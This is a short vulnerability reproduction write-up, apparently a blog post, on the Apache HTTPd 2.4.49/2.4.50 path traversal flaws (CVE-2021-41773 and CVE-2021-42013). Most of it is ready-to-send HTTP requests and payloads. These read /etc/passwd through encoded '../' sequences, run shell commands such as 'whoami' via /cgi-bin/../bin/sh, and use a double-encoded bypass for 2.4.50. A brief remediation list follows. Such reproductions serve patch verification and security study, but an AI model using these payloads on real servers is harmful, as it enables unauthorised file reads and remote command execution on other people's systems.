Apache CVE-2021-41773 vulnerability reproduction

Vulnerability overview

Apache HTTPd is a popular open-source HTTP server from the Apache Software Foundation. On 8 October 2021 the Apache HTTPd project published a security update disclosing CVE-2021-42013, a path traversal vulnerability in Apache HTTPd 2.4.49/2.4.50. Because the fix for CVE-2021-41773 (the path traversal vulnerability in Apache HTTPd 2.4.49) was incomplete, an attacker can craft requests that bypass the patch and use the traversal to read files outside the web root. If CGI support is enabled in Apache HTTPd, an attacker can also craft requests that execute commands and take control of the server.

Affected versions

Apache HTTPd 2.4.49
Apache HTTPd 2.4.50

Preconditions

1. Directory traversal is permitted in the configuration, and CGI mode is enabled
2. Apache HTTPd version is 2.4.49 or 2.4.50
3. The cgi-bin and icons directories exist

Reproduction

GET request (directory traversal):

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close

payload:

/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

[Image 1: Apache CVE-2021-41773 vulnerability reproduction]

POST request (command execution):

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

echo;whoami

payload:

/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

echo;whoami

[Image 2: Apache CVE-2021-41773 vulnerability reproduction]

The fix shipped in Apache HTTPd 2.4.50 for the previous version's vulnerability was incomplete, so 2.4.50 is also affected.

GET payload:

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

POST payload:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;whoami

Simply URL-encode the previous version's payload one more time.

Remediation

1. Upgrade to a version newer than 2.4.50
2. Disable directory traversal
3. Disable CGI mode
